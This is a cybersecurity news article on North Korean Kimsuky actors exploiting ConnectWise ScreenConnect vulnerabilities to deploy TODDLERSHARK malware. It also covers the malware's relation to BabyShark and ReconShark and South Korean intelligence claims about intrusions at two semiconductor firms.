Cybercriminals Use ConnectWise ScreenConnect Vulnerabilities to Spread TODDLERSHARK Malware
Threat actors from North Korea have been using the newly discovered security holes in ConnectWise ScreenConnect to spread a brand-new piece of malware known as TODDLERSHARK.
A research published by Kroll with The Hacker News claims that TODDLERSHARK has similarities with well-known Kimsuky malware, including BabyShark and ReconShark.
Security researchers Dave Truman, George Glass, and Keith Wojcieszek said that “the threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application.”
“They then leveraged their now ‘hands on keyboard’ access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware.”
The aforementioned ConnectWise vulnerabilities, identified as CVE-2024-1708 and CVE-2024-1709, were discovered last month and have since been extensively exploited by various threat actors to distribute ransomware, stealer malware, cryptocurrency miners, and remote access trojans.
APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), KTA082, Nickel Kimball, and Velvet Chollima are just a few of the aliases that Kimsuky goes by. It has been adding additional tools to its malware arsenal throughout time, the most recent being GoBear and Troll Stealer.
When BabyShark is started, an HTML Application (HTA) file is used. It was originally found in late 2018. After it is run, the malware known as VB script stays on the system, waits for further instructions from the operator, and exfiltrates system data to a command-and-control (C2) server.
Then, in May 2023, it was noticed that a BabyShark variation called ReconShark was being sent via spear-phishing emails to those who had been particularly targeted. Because of TODDLERSHARK’s coding and behavior, it is believed to represent the most recent development of the same virus.
In addition to using a scheduled job for persistence, the malware is designed to obtain and exfiltrate private data from the affected computers, serving as an effective reconnaissance instrument.
THE TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generate C2 URLs, which could make this malware hard to detect in some environments,” according to the researchers.
The discovery coincides with accusations made by the National Intelligence Service (NIS) of South Korea against its northern equivalent for reportedly breaking into the computers of two local semiconductor firms, who have not been identified, and stealing sensitive information.
The cyberattacks happened between February 2024 and December 2023. According to reports, the threat actors first gained access to servers that were accessible to the internet and were deemed susceptible. To further avoid detection, they then used living-off-the-land (LotL) tactics instead of dumping malware.
“North Korea may have begun preparations for its own production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles,” NIS said.